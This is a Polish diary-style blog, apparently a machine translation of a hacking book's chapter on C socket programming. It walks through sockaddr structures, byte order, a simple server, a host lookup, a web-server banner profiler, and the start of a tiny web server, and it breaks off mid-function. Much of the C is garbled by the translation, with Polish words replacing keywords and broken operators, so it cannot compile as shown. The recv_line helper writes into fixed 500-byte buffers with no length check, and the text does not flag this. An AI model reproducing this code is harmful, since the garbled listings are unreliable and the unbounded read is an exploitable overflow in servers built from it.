Drogi Pami�tniczku …

01.08.2020

Adresy gniazd

Wiele funkcji gniazda odwo�uje si� do struktury sockaddr, aby przekaza� informacje adresowe, kt�re definiuj� hosta. Ta struktura jest r�wnie� zdefiniowana w bitach / socket.h, jak pokazano na nast�pnej stronie.

/usr/include/bits/socket.h

/* Get the definition of the macro to define the common sockaddr members. */

#include

/* Structure describing a generic socket address. */

struct sockaddr

{

__SOCKADDR_COMMON (sa_); /* Common data: address family and length. */

char sa_data[14]; /* Address data. */

};

Makro dla SOCKADDR_COMMON jest zdefiniowane w do��czonym pliku bit�w / sockaddr.h, co zasadniczo t�umaczy si� na unsigned short int. Ta warto�� okre�la rodzin� adresu, a reszta struktury jest zapisywana dla danych adresowych. Poniewa� gniazda mog� komunikowa� si� za pomoc� r�nych rodzin protoko��w, ka�dy z w�asnym sposobem definiowania adres�w punkt�w ko�cowych, definicja adresu r�wnie� musi by� zmienna, w zale�no�ci od rodziny adres�w. Mo�liwe rodziny adres�w s� r�wnie� zdefiniowane w bitach / socket.h; zwykle t�umacz� bezpo�rednio na odpowiednie rodziny protoko��w.

/usr/include/bits/socket.h

/ * Adres rodziny. * /

#define AF_UNSPEC PF_UNSPEC

#define AF_LOCAL PF_LOCAL

#define AF_UNIX PF_UNIX

#define AF_FILE PF_FILE

#define AF_INET PF_INET

#define AF_AX25 PF_AX25

#define AF_IPX PF_IPX

#define AF_APPLETALK PF_APPLETALK

#define AF_NETROM PF_NETROM

#define AF_BRIDGE PF_BRIDGE

#define AF_ATMPVC PF_ATMPVC

#define AF_X25 PF_X25

#define AF_INET6 PF_INET6

…

Poniewa� adres mo�e zawiera� r�ne typy informacji, w zale�no�ci od rodziny adres�w istnieje kilka innych struktur adres�w, kt�re zawieraj� w sekcji danych adresu wsp�lne elementy ze struktury sockaddr, a tak�e informacje dotycz�ce rodziny adres�w. Struktury te s� r�wnie� tej samej wielko�ci, wi�c mog� by� typograficzne do i od siebie nawzajem. Oznacza to, �e funkcja socket () po prostu zaakceptuje wska�nik do struktury sockaddr, kt�ra w rzeczywisto�ci mo�e wskazywa� na struktur� adresu dla IPv4, IPv6 lub X.25. Dzi�ki temu funkcje gniazd mog� dzia�a� na r�nych protoko�ach. Zajmiemy si� protoko�em internetowym w wersji 4, kt�ry jest rodzin� protoko��w PF_INET, przy u�yciu rodziny adres�w AF_INET. Struktura adresowa gniazda r�wnoleg�ego dla AF_INET jest zdefiniowana w pliku netinet / in.h.

/usr/include/netinet/in.h

/ * Struktura opisuj�ca adres gniazda internetowego. * /

struct sockaddr_in

{

__SOCKADDR_COMMON (sin_);

in_port_t sin_port; /* Numer portu. * /

struct in_addr sin_addr; /* Adres internetowy. * /

/ * Podk�adka do rozmiaru "struct sockaddr". * /

unsigned char sin_zero [sizeof (struct sockaddr) -

__SOCKADDR_COMMON_SIZE -

sizeof (in_port_t) -

sizeof (struct in_addr)];

};

Cz�� SOCKADDR_COMMON na g�rze struktury jest po prostu wspomnian� wcze�niej niepodpisan� kr�tk� int, kt�ra s�u�y do zdefiniowania rodziny adres�w. Poniewa� adres punktu ko�cowego gniazda sk�ada si� z adresu internetowego i numeru portu, s� to kolejne dwie warto�ci w strukturze. Numer portu jest 16-bitowy, a in_addr struktura u�ywana dla adresu internetowego zawiera 32-bitow� liczb�. Reszta struktury to tylko 8 bajt�w wype�nienia, aby wype�ni� reszt� struktury sockaddr. Ta przestrze� nie jest u�ywana do niczego, ale musi by� zapisana, aby struktury mog�y by� zamiennie typograficzne.

Powr�t

02.08.2020

Network Byte Order

Oczekuje si�, �e numer portu i adres IP u�ywane w strukturze adresu gniazda AF_INET b�d� zgodne z porz�dkiem bajt�w sieciowych, kt�ry jest big-endian. Jest to przeciwie�stwo uporz�dkowania bajt�w w ma�ych bitmach x86, wi�c te warto�ci musz� zosta� przekonwertowane. Jest kilka funkcji specyficznych dla tych konwersji, kt�rych prototypy s� zdefiniowane w plikach netinet / in.h i arpa / inet.h. Oto podsumowanie funkcji konwersji wsp�lnego zlecenia na bajt:

htonl

(d�uga warto��) Host-to-Network Long

Konwertuje 32-bitow� liczb� ca�kowit� z kolejno�ci bajt�w hosta na kolejno�� bajt�w sieciowych

htons

(kr�tka warto��) Kr�tki skr�t mi�dzy hostami

Konwertuje 16-bitow� liczb� ca�kowit� z kolejno�ci bajt�w hosta na kolejno�� bajt�w sieciowych

ntohl

(d�uga warto��) Od d�ugiej sieci do hosta

Konwertuje 32-bitow� liczb� ca�kowit� z kolejki bajt�w sieciowych na kolejno�� bajt�w hosta

ntohs

(d�uga warto��) Skr�t mi�dzy hostami

Konwertuje 16-bitow� liczb� ca�kowit� z kolejki bajt�w sieciowych na kolejno�� bajt�w hosta

Aby zapewni� zgodno�� ze wszystkimi architekturami, te funkcje konwersji powinny nadal by� u�ywane, nawet je�li host u�ywa procesora z du�� liczb� bajt�w.

Powr�t

03.08.2020

Konwersja adres�w internetowych

Kiedy widzisz 12.110.110.204, prawdopodobnie rozpoznasz to jako adres internetowy (wersja IP 4). Ta znana notacja z kropkami jest popularnym sposobem okre�lania adres�w internetowych i istniej� funkcje do konwersji tej notacji do 32-bitowej liczby ca�kowitej w kolejno�ci bajt�w sieciowych. Te funkcje s� zdefiniowane w pliku arpa / inet.h do��cz plik, a dwie najbardziej u�yteczne funkcje konwersji to:

inet_aton (char * ascii_addr, struct in_addr * network_addr)

ASCII to Networkd

Ta funkcja przekszta�ca �a�cuch ASCII zawieraj�cy adres IP w formacie kropkowanym na struktur� in_addr, kt�ra, jak pami�tamy, zawiera tylko 32-bitow� liczb� ca�kowit� reprezentuj�c� adres IP w kolejno�ci bajt�w sieciowych.

inet_ntoa (struct in_addr * network_addr)

Network to ASCII

Ta funkcja konwertuje w drug� stron�. Przekazany jest wska�nik do struktury in_addr zawieraj�cej adres IP, a funkcja zwraca wska�nik znaku do �a�cucha ASCII zawieraj�cego adres IP w format kropkowo-liczbowy. Ci�g ten jest przechowywany w statycznie przydzielonym buforze pami�ci w funkcji, dzi�ki czemu mo�na uzyska� do niego dost�p a� do nast�pnego wywo�ania inet_ntoa (), kiedy ci�g znak�w zostanie nadpisany.

Powr�t
04.08.2020

Prosty przyk�ad serwera

Najlepszym sposobem pokazania, w jaki spos�b te funkcje s� u�ywane, jest przyk�ad. Poni�szy kod serwera nas�uchuje po��cze� TCP na porcie 7890. Gdy klient ��czy si�, wysy�a wiadomo�� Hello, world! a nast�pnie odbiera dane, dop�ki po��czenie nie zostanie zamkni�te. Odbywa si� to za pomoc� funkcji gniazd i struktur z wymienionych wcze�niej plik�w w��czaj�cych, dlatego te pliki s� uwzgl�dniane na pocz�tku programu. Przydatna funkcja zrzutu pami�ci zosta�a dodana do pliku hacking.h, kt�ry jest pokazany na nast�pnej stronie.

Dodano do hacking.h

// Zrzuca surow� pami�� w formacie szesnastkowym i drukowanym formacie podzia�u

void dump (const unsigned char * data_buffer, const unsigned int length) {

niepodpisany bajt char;

unsigned int i, j;

for (i = 0; i < length; i ++) {

byte = data_buffer [i];

printf ("% 02x", bufor_danych [i]); // Wy�wietl bajt w hex.

if ((((% 16) == 15) || (i == d�ugo��-1)) {

dla (j = 0; j <15- (i% 16); j ++)

printf ("");

printf ("|");

dla (j = (i- (i% 16)); j <= i; j ++) {// Wy�wietla bajty do wydrukowania z linii.

byte = data_buffer [j];

if ((byte> 31) && (bajt < 127)) // Zewn�trzny zakres znak�w do druku

printf ("% c", bajt);

jeszcze

printf (".");

}

printf ("\ n"); // Koniec linii zrzutu (ka�da linia ma 16 bajt�w)

} // Koniec, je�li

} // Zako�cz dla

}

Ta funkcja s�u�y do wy�wietlania danych pakietowych przez program serwera. Jednak�e, poniewa� jest on r�wnie� u�yteczny w innych miejscach, zamiast tego zosta� umieszczony w hacking.h. Reszta programu serwera zostanie wyja�niona po przeczytaniu kodu �r�d�owego.

simple_server.c

#include < stdio.h >

#include < stdlib.h >

#include < string.h >

#include < sys / socket.h >

#include < netinet / in.h >

#include < arpa / inet.h >

#include "hacking.h"

#define PORT 7890 // U�ytkownicy portu b�d� si� ��czy�

int main (void) {

int sockfd, new_sockfd; // Pos�uchaj na sock_fd, nowe po��czenie na new_fd

struct sockaddr_in host_addr, client_addr; // Moje dane adresowe

socklen_t sin_size;

int recv_length = 1, tak = 1;

bufor znakuj�cy [1024];

if ((sockfd = socket (PF_INET, SOCK_STREAM, 0)) == -1)

�miertelne ("w gnie�dzie");

je�li (setsockopt (sockfd, SOL_SOCKET, SO_REUSEADDR, i tak, sizeof (int)) == -1)

fatal ("ustawienie gniazda SO_REUSEADDR");

Do tej pory program ustawia gniazdo za pomoc� funkcji socket (). Chcemy gniazda TCP / IP, wi�c rodzina protoko��w to PF_INET dla IPv4, a typ gniazda to SOCK_STREAM dla gniazda strumieniowego. Ostatnim argumentem protoko�u jest 0, poniewa� w rodzinie protoko��w PF_INET istnieje tylko jeden protok�. Ta funkcja zwraca deskryptor pliku gniazda, kt�ry jest przechowywany w sockfd. Funkcja setsockopt () jest po prostu u�ywana do ustawiania opcji gniazd. To wywo�anie funkcji ustawia gniazdo SO_REUSEADDR opcja true, kt�ra pozwoli mu ponownie u�y� danego adresu do wi�zania. Bez tej opcji, gdy program spr�buje po��czy� si� z danym portem, nie powiedzie si�, je�li ten port jest ju� w u�yciu. Je�li gniazdo nie jest poprawnie zamkni�te, mo�e wydawa� si�, �e jest w u�yciu, wi�c ta opcja pozwala powi�za� gniazdo z portem (i przej�� nad nim kontrol�), nawet je�li wydaje si� by� w u�yciu. Pierwszym argumentem tej funkcji jest gniazdo (do kt�rego odwo�uje si� deskryptor pliku), drugie okre�la poziom opcji, a trzecie okre�la sam� opcj�. Poniewa� SO_REUSEADDR jest opcj� na poziomie gniazda, poziom jest ustawiony na SOL_SOCKET. Istnieje wiele r�nych opcji gniazd zdefiniowanych w / usr / include / asm / socket.h. Ostatnie dwa argumenty s� wska�nikiem do danych, dla kt�rych opcja powinna by� ustawiona i do d�ugo�ci tych danych. Wska�nik do danych i d�ugo�� tych danych to dwa argumenty, kt�re s� cz�sto u�ywane z funkcjami gniazda. Dzi�ki temu funkcje obs�uguj� wszystkie rodzaje danych, od pojedynczych bajt�w po du�e struktury danych. Opcje SO_REUSE ADDR u�ywa 32-bitowej liczby ca�kowitej dla jej warto�ci, wi�c aby ustawi� t� opcj� na true, ko�cowe dwa argumenty musz� by� wska�nikiem do liczby ca�kowitej r�wnej 1 i wielko�ci liczby ca�kowitej (kt�ra wynosi 4 bajty).

host_addr.sin_family = AF_INET; // Kolejno�� bajt�w hosta

host_addr.sin_port = htons (PORT); // Kr�tka kolejno�� bajt�w sieciowych

host_addr.sin_addr.s_addr = 0; // Automatycznie wype�nij m�j adres IP.

memset (& (host_addr.sin_zero), '\ 0', 8); // Zeruj reszt� struktury.

if (bind (sockfd, (struct sockaddr *) i host_addr, sizeof (struct sockaddr)) == -1)

fatal ("powi�zanie z gniazdem");

if (listen (sockfd, 5) == -1)

fatal ("nas�uchiwanie na gnie�dzie");

W nast�pnych kilku wierszach ustawiono struktur� host_addr do u�ycia w wywo�aniu bind. Rodzina adres�w to AF_INET, poniewa� u�ywamy IPv4 i sockaddr_instructure. Port jest ustawiony na PORT, kt�ry jest zdefiniowany jako 7890. Ta kr�tka warto�� ca�kowita musi zosta� zamieniona na kolejno�� bajt�w sieciowych, wi�c u�ywana jest funkcja htons (). Adres jest ustawiony na 0, co oznacza, �e zostanie automatycznie wype�niony aktualnym adresem IP hosta. Poniewa� warto�� 0 jest taka sama, niezale�nie od kolejno�ci bajt�w, konwersja nie jest konieczna. Wywo�anie bind () przekazuje deskryptor pliku gniazda, struktur� adresu i d�ugo�� struktury adresu. To po��czenie spowoduje po��czenie gniazda z bie��cym adresem IP na porcie 7890. Wywo�anie listen () powoduje, �e gniazdo nas�uchuje po��cze� przychodz�cych, a kolejne wywo�anie accept () faktycznie akceptuje po��czenie przychodz�ce. Funkcja listen () umieszcza wszystkie po��czenia przychodz�ce w kolejce zaleg�o�ci, dop�ki po��czenie accept () nie zaakceptuje po��cze�. Ostatni argument wywo�ania listen () okre�la maksymalny rozmiar kolejki zaleg�o�ci.

while (1) {// Akceptuj p�tl�.

sin_size = sizeof (struct sockaddr_in);

new_sockfd = accept (sockfd, (struct sockaddr *) & client_addr i sin_size);

if (new_sockfd == -1)

�miertelne ("akceptuj�ce po��czenie");

printf ("serwer: uzyska�em po��czenie z% s portu% d \ n",

inet_ntoa (client_addr.sin_addr), ntohs (client_addr.sin_port));

wy�lij (new_sockfd, "Hello, world! \ n", 13, 0);

recv_length = recv (new_sockfd, & buffer, 1024, 0);

while (recv_length> 0) {

printf ("RECV:% d bajt�w \ n", recv_length);

dump (buffer, recv_length);

recv_length = recv (new_sockfd, & buffer, 1024, 0);

}

close (new_sockfd);

}

return 0;

}

Dalej jest p�tla, kt�ra akceptuje po��czenia przychodz�ce. Pierwsze dwa argumenty funkcji accept () powinny mie� natychmiastowy sens; ostatni argument jest wska�nikiem rozmiaru struktury adresu. Dzieje si� tak dlatego, �e funkcja accept () zapisze informacje o adresie klienta ��cz�cego w strukturze adresu i rozmiarze tej struktury na sin_size. Dla naszych cel�w wielko�� nigdy si� nie zmienia, ale aby u�y� funkcji, musimy przestrzega� konwencji wzywaj�cej. Funkcja accept () zwraca nowy deskryptor pliku gniazda dla zaakceptowanego po��czenia. W ten spos�b oryginalny deskryptor pliku gniazda mo�e by� nadal u�ywany do akceptowania nowych po��cze�, podczas gdy nowy deskryptor pliku gniazda s�u�y do komunikacji z pod��czonym klientem. Po uzyskaniu po��czenia, program wypisuje komunikat po��czenia, u�ywaj�c inet_ntoa (), aby przekszta�ci� struktur� adresu sin_addr na napis IP o liczbie kropkowej i ntohs (), aby przekonwertowa� kolejno�� bajt�w numeru sin_port. Funkcja send () wysy�a 13 bajt�w ci�gu Hello, world! \ N do nowego gniazda opisuj�cego nowe po��czenie. Ostatnim argumentem funkcji send () i recv () s� flagi, kt�re dla naszych cel�w b�d� zawsze r�wne 0. Kolejne jest p�tla, kt�ra odbiera dane z po��czenia i wypisuje je. Funkcja recv () otrzymuje wska�nik do bufora i maksymaln� d�ugo�� do odczytania z gniazda. Funkcja zapisuje dane do bufora przekazanego do niego i zwraca liczb� faktycznie zapisanych bajt�w. P�tla b�dzie kontynuowana, dop�ki wywo�anie recv () b�dzie kontynuowa� odbieranie danych. Po skompilowaniu i uruchomieniu program ��czy si� z portem 7890 hosta i czeka na po��czenia przychodz�ce: reader @ hacking : ~ / booksrc $ gcc simple_server.c

reader @ hacking: ~ / booksrc $ ./a.out

Klient telnet dzia�a zasadniczo jak zwyk�y klient po��czenia TCP, wi�c mo�na go u�y� do po��czenia z prostym serwerem, okre�laj�c docelowy adres IP i port.

Powr�t
05.08.2020

Przyk�ad klienta sieci Web

Program telnet dzia�a dobrze jako klient dla naszego serwera, wi�c naprawd� nie ma powodu, by pisa� wyspecjalizowanego klienta. Istniej� jednak tysi�ce r�nych typ�w serwer�w, kt�re akceptuj� standardowe po��czenia TCP / IP. Za ka�dym razem, gdy u�ywasz przegl�darki internetowej, nawi�zuje ona po��czenie z serwerem internetowym. To po��czenie przesy�a stron� internetow� nad po��czeniem za pomoc� protoko�u HTTP, kt�ra definiuje okre�lony spos�b ��dania i wysy�ania informacji. Domy�lnie, serwery WWW dzia�aj� na porcie 80, kt�ry jest wymieniony wraz z wieloma innymi domy�lnymi portami w / etc / services.

Od / etc / services

finger 79 / tcp # palec

finger 79 / udp

http 80 / tcp www

www-http # Internet HTTP HTTP HTTP istnieje w warstwie aplikacji - najwy�szej warstwie - modelu OSI. Na tej warstwie wszystkie szczeg�y sieci zosta�y ju� obs�u�one przez ni�sze warstwy, wi�c HTTP u�ywa tekstowego tekstu do swojej struktury. Wiele innych protoko��w warstwy aplikacji r�wnie� wykorzystuje tekst jawny, taki jak protok� POP3, SMTP, IMAP i kana� kontrolny FTP. Poniewa� s� to standardowe protoko�y, wszystkie s� dobrze udokumentowane i �atwo zbadane. Gdy znasz sk�adni� tych r�nych protoko��w, mo�esz r�cznie rozmawia� z innymi programami, kt�re m�wi� tym samym j�zykiem. Nie musisz by� bieg�y, ale znaj�c kilka wa�nych zwrot�w, pomo�esz w podr�y na zagraniczne serwery. W j�zyku HTTP ��dania s� wykonywane za pomoc� polecenia GET, a nast�pnie �cie�ki zasobu i protoko�u http wersja. Na przyk�ad GET / HTTP / 1.0 za��da dokumentu g��wnego z serwera sieciowego przy u�yciu protoko�u HTTP w wersji 1.0. ��danie dotyczy katalogu g��wnego /, ale wi�kszo�� serwer�w automatycznie wyszukuje domy�lny dokument HTML w katalogu index.html. Je�li serwer znajdzie zas�b, odpowie, u�ywaj�c protoko�u HTTP, wysy�aj�c kilka nag��wk�w przed wys�aniem tre�ci. Je�li zamiast GET zostanie u�yta komenda HEAD, zwr�ci ona tylko nag��wki HTTP bez zawarto�ci. Nag��wki te s� tekstem jawnym i zwykle dostarczaj� informacji o serwerze. Te nag��wki mo�na pobra� r�cznie za pomoc� telnetu, ��cz�c si� z portem 80 znanej strony internetowej, a nast�pnie wpisuj�c HEAD / HTTP / 1.0 i naciskaj�c dwukrotnie klawisz ENTER. W poni�szym wyj�ciu telnet s�u�y do otwierania po��czenia TCP-IP z serwerem internetowym pod adresem http://www.internic.net. Nast�pnie warstwa aplikacji HTTP jest r�cznie wymawiana, aby za��da� nag��wk�w dla g��wnej strony indeksu.

reader@hacking: ~ / booksrc $ telnet www.internic.net 80

Pr�buj� 208.77.188.101 ...

Po��czony z www.internic.net.

Escape to "^]".

HEAD / HTTP / 1.0

HTTP / 1.1 200 OK

Data: pi�tek, 14 wrze�nia 2007 r. 05:34:14 GMT

Serwer: Apache / 2.0.52 (CentOS)

Accept-Ranges: bytes

D�ugo�� zawarto�ci: 6743

Po��czenie: zamknij

Content-Type: text / html; charset = UTF-8

Po��czenie zosta�o zamkni�te przez zdalnego hosta.

reader@hacking: ~ / booksrc $

To pokazuje, �e serwer WWW to Apache w wersji 2.0.52, a nawet �e host obs�uguje CentOS. Mo�e to by� przydatne do profilowania, wi�c napiszmy program, kt�ry automatyzuje ten r�czny proces. Nast�pne kilka program�w b�dzie wysy�a� i odbiera� du�o danych. Poniewa� standardowe funkcje gniazda nie s� zbyt przyjazne, napiszmy kilka funkcji do wysy�ania i odbierania danych. Funkcje te, nazwane send_string () i recv_line (), zostan� dodane do nowego pliku w��czaj�cego o nazwie hacking-network.h. Normalna funkcja send () zwraca liczb� zapisanych bajt�w, kt�ra nie zawsze jest r�wna liczbie bajt�w, kt�re pr�bowa�e� wys�a�. Funkcja send_string () akceptuje gniazdo i wska�nik �a�cuchowy jako argumenty i zapewnia, �e ca�y ci�g jest wysy�any przez gniazdo. U�ywa strlen (), aby okre�li� ca�kowit� d�ugo�� przekazanego do niego ci�gu. By� mo�e zauwa�y�e�, �e ka�dy pakiet otrzymany przez prosty serwer zako�czy� si� bajtami 0x0D i 0x0A. W ten spos�b telnet ko�czy linie - wysy�a powr�t karetki i znak nowej linii. Protok� HTTP oczekuje r�wnie�, �e linie zostan� zako�czone tymi dwoma bajtami. Szybkie spojrzenie na tabel� ASCII pokazuje, �e 0x0D jest a powr�t karetki ('\ r') i 0x0A to znak nowej linii ('\ n'). czytnik @ hacking: ~ / booksrc $ man ascii | egrep "Hex | 0A | 0D" Ponowne formatowanie ascii (7), prosz� czeka� ...

Oct Dec Hex Char Oct Dec Hex Char

012 10 0A LF '\ n' (nowa linia) 112 74 4A J

015 13 0D CR '\ r' (powr�t karetki) 115 77 4D M

reader @ hacking: ~ / booksrc $

Funkcja recv_line () odczytuje ca�e linie danych. Odczytywany jest z gniazda przekazanego jako pierwszy argument do bufora, na kt�ry wskazuje drugi argument. Kontynuuje odbieranie z gniazda, dop�ki nie napotka dw�ch ostatnich bajt�w linii bazowej. Nast�pnie ko�czy �a�cuch i ko�czy dzia�anie funkcji. Te nowe funkcje zapewniaj�, �e wszystkie bajty s� wysy�ane i odbieraj� dane w postaci linii zako�czonych przez '\ r \ n'. S� one wymienione poni�ej w nowym pliku w��czaj�cym o nazwie hacking-network.h.

hacking-network.h

/* This function accepts a socket FD and a ptr to the null terminated

* string to send. The function will make sure all the bytes of the

* string are sent. Returns 1 on success and 0 on failure.

*/

int send_string(int sockfd, unsigned char *buffer) {

int sent_bytes, bytes_to_send;

bytes_to_send = strlen(buffer);

while(bytes_to_send > 0) {

sent_bytes = send(sockfd, buffer, bytes_to_send, 0);

if(sent_bytes == -1)

return 0; // Return 0 on send error.

bytes_to_send -= sent_bytes;

buffer += sent_bytes;

}

return 1; // Return 1 on success.

}

/* This function accepts a socket FD and a ptr to a destination

* buffer. It will receive from the socket until the EOL byte

* sequence in seen. The EOL bytes are read from the socket, but

* the destination buffer is terminated before these bytes.

* Returns the size of the read line (without EOL bytes).

*/

int recv_line(int sockfd, unsigned char *dest_buffer) {

#define EOL "\r\n" // End-of-line byte sequence

#define EOL_SIZE 2

unsigned char *ptr;

int eol_matched = 0;

ptr = dest_buffer;

while(recv(sockfd, ptr, 1, 0) == 1) { // Read a single byte.

if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?

eol_matched++;

if(eol_matched == EOL_SIZE) { // If all bytes match terminator,

*(ptr+1-EOL_SIZE) = '\0'; // terminate the string.

return strlen(dest_buffer); // Return bytes received

}

} else {

eol_matched = 0;

}

ptr++; // Increment the pointer to the next byter.

}

return 0; // Didn't find the end-of-line characters.

}

Wykonywanie po��czenia z gniazdem na liczbowy adres IP jest do�� proste, ale adresy nazwane s� powszechnie u�ywane dla wygody. W r�cznym ��daniu HTTP HEAD program telnet automatycznie wykonuje wyszukiwanie DNS (Domain Name Service), aby stwierdzi�, �e www.internic.net t�umaczy si� na adres IP 192.0.34.161. DNS to protok�, kt�ry umo�liwia wyszukiwanie adresu IP pod podanym adresem, podobnie jak w ksi��ce telefonicznej mo�na znale�� numer telefonu, je�li znasz jego nazw�. Oczywi�cie istniej� funkcje i struktury zwi�zane z gniazdami, przeznaczone specjalnie do wyszukiwania nazw host�w za po�rednictwem DNS. Te funkcje i struktury s� zdefiniowane w netdb.h. Funkcja o nazwie gethostbyname () pobiera wska�nik do �a�cucha zawieraj�cego nazwany adres i zwraca wska�nik do hostentstructure lub wska�nik NULL w przypadku b��du. Struktura hosta jest wype�niana informacjami z wyszukiwania, w tym liczbowym adresem IP jako 32-bitow� liczb� ca�kowit� w porz�dku bajt�w sieciowych. Podobnie do funkcji inet_ntoa () pami�� dla tej struktury jest statycznie alokowana w funkcji. Ta struktura jest pokazana poni�ej, jak podano w netdb.h

Powr�t

06.08.2020

/usr/include/netdb.h

/* Description of database entry for a single host. */

struct hostent

{

char *h_name; /* Official name of host. */

char **h_aliases; /* Alias list. */

int h_addrtype; /* Host address type. */

int h_length; /* Length of address. */

char **h_addr_list; /* List of addresses from name server. */

#define h_addr h_addr_list[0] /* Address, for backward compatibility. */

};

Poni�szy kod demonstruje u�ycie funkcji gethostbyname ().

host_lookup.c

#include < stdio.h >

#include < stdlib.h >

#include < string.h >

#include < sys/socket.h>

#include < netinet/in.h >

#include < arpa/inet.h >

#include < netdb.h >

#include "hacking.h"

int main(int argc, char *argv[]) {

struct hostent *host_info;

struct in_addr *address;

if(argc < 2) {

printf("Usage: %s < hostname >\n", argv[0]);

exit(1);

}

host_info = gethostbyname(argv[1]);

if(host_info == NULL) {

printf("Couldn't lookup %s\n", argv[1]);

} else {

address = (struct in_addr *) (host_info->h_addr);

printf("%s has address %s\n", argv[1], inet_ntoa(*address));

}

}

Ten program przyjmuje nazw� hosta jako jedyny argument i wypisuje adres IP. Funkcja gethostbyname () zwraca wska�nik do struktury hosta, kt�ra zawiera adres IP w elemencie h_addr. Wska�nikiem do tego elementu jest typecast do wska�nika in_addr, kt�ry jest p�niej dereferenced dla wywo�ania inet_ntoa (), kt�ry oczekuje struktury in_addr jako argumentu. Przyk�adowe wyniki programu pokazano na nast�pnej stronie.

reader@hacking:~/booksrc $ gcc -o host_lookup host_lookup.c

reader@hacking:~/booksrc $ ./host_lookup www.internic.net

www.internic.net has address 208.77.188.101

reader@hacking:~/booksrc $ ./host_lookup www.google.com

www.google.com has address 74.125.19.103

reader@hacking:~/booksrc $

Korzystanie z funkcji gniazdowych w oparciu o to, tworzenie programu identyfikacji serwera sieciowego nie jest trudne.

webserver_id.c

#include < stdio.h >

#include < stdlib.h >

#include < string.h >

#include < sys/socket.h >

#include < netinet/in.h >

#include < arpa/inet.h >

#include < netdb.h >

#include "hacking.h"

#include "hacking-network.h"

int main(int argc, char *argv[]) {

int sockfd;

struct hostent *host_info;

struct sockaddr_in target_addr;

unsigned char buffer[4096];

if(argc < 2) {

printf("Usage: %s < hostname>\n", argv[0]);

exit(1);

}

if((host_info = gethostbyname(argv[1])) == NULL)

fatal("looking up hostname");

if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)

fatal("in socket");

target_addr.sin_family = AF_INET;

target_addr.sin_port = htons(80);

target_addr.sin_addr = *((struct in_addr *)host_info->h_addr);

memset(&(target_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1)

fatal("connecting to target server");

send_string(sockfd, "HEAD / HTTP/1.0\r\n\r\n");

while(recv_line(sockfd, buffer)) {

if(strncasecmp(buffer, "Server:", 7) == 0) {

printf("The web server for %s is %s\n", argv[1], buffer+8);

exit(0);

}

}

printf("Server line not found\n");

exit(1);

}

Wi�kszo�� tego kodu powinna teraz mie� sens. Element sin_addr struktury target_addr jest wype�niany przy u�yciu adresu ze struktury host_info poprzez typowanie, a nast�pnie dereferencje jak poprzednio (ale tym razem jest to wykonywane w jednym wierszu). Funkcja connect () jest wywo�ywana w celu po��czenia z portem 80 hosta docelowego, �a�cuch polece� jest wysy�any, a p�tle programu odczytuj� ka�d� lini� do bufora. Funkcja strncasecmp () jest funkcj� por�wnywania ci�g�w z ci�gu strings.h. Ta funkcja por�wnuje pierwsze n bajt�w dw�ch ci�g�w, ignoruj�c wielkie litery. Pierwsze dwa argumenty to wska�niki do �a�cuch�w, a trzeci argument to n, liczba bajt�w do por�wnania. Funkcja zwr�ci 0, je�li �a�cuchy b�d� zgodne, wi�c instrukcja if szuka linii rozpoczynaj�cej si� od "Server:". Po znalezieniu usuwa pierwsze osiem bajt�w i drukuje wersj� serwera WWW Poni�sza lista pokazuje kompilacj� i wykonanie programu.

reader@hacking:~/booksrc $ gcc -o webserver_id webserver_id.c

reader@hacking:~/booksrc $ ./webserver_id www.internic.net

The web server for www.internic.net is Apache/2.0.52 (CentOS)

reader@hacking:~/booksrc $ ./webserver_id www.microsoft.com

The web server for www.microsoft.com is Microsoft-IIS/7.0

reader@hacking:~/booksrc $

Powr�t

07.08.2020

Serwer Tinyweb

Serwer internetowy nie musi by� du�o bardziej skomplikowany ni� prosty serwer, kt�ry stworzyli�my w poprzedniej sekcji. Po zaakceptowaniu po��czenia TCP-IP serwer internetowy musi implementowa� kolejne warstwy komunikacji za pomoc� protoko�u HTTP. Podany poni�ej kod serwera jest prawie identyczny z prostym serwerem, z tym �e kod obs�ugi po��czenia jest podzielony na jego w�asn� funkcj�. Ta funkcja obs�uguje ��dania HTTP GET i HEAD, kt�re pochodz� z sieci przegl�darki. Program wyszuka ��dany zas�b w lokalnym katalogu o nazwie webroot i wy�le go do przegl�darki. Je�li pliku nie mo�na znale��, serwer odpowie odpowiedz� HTTP 404. By� mo�e znasz ju� t� odpowied�, co oznacza, �e nie znaleziono pliku. Poni�ej znajduje si� pe�ny wykaz kod�w �r�d�owych.

tinyweb.c

#include < stdio.h >

#include < fcntl.h >

#include < stdlib.h >

#include < string.h >

#include

#include < sys/socket.h >

#include < netinet/in.h >

#include < arpa/inet.h >

#include "hacking.h"

#include "hacking-network.h"

#define PORT 80 // The port users will be connecting to

#define WEBROOT "./webroot" // The web server's root directory

void handle_connection(int, struct sockaddr_in *); // Handle web requests

int get_file_size(int); // Returns the filesize of open file descriptor

int main(void) {

int sockfd, new_sockfd, yes=1;

struct sockaddr_in host_addr, client_addr; // My address information

socklen_t sin_size;

printf("Accepting web requests on port %d\n", PORT);

if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)

fatal("in socket");

if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)

fatal("setting socket option SO_REUSEADDR");

host_addr.sin_family = AF_INET; // Host byte order

host_addr.sin_port = htons(PORT); // Short, network byte order

host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.

memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)

fatal("binding to socket");

if (listen(sockfd, 20) == -1)

fatal("listening on socket");

while(1) { // Accept loop.

sin_size = sizeof(struct sockaddr_in);

new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);

if(new_sockfd == -1)

fatal("accepting connection");

handle_connection(new_sockfd, &client_addr);

}

return 0;

}

/* This function handles the connection on the passed socket from the

* passed client address. The connection is processed as a web request,

* and this function replies over the connected socket. Finally, the

* passed socket is closed at the end of the function.

*/

void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr) {

unsigned char *ptr, request[500], resource[500];

int fd, length;

length = recv_line(sockfd, request);

printf("Got request from %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr),

ntohs(client_addr_ptr->sin_port), request);

ptr = strstr(request, " HTTP/"); // Search for valid-looking request.

if(ptr == NULL) { // Then this isn't valid HTTP.

printf(" NOT HTTP!\n");

} else {

*ptr = 0; // Terminate the buffer at the end of the URL.

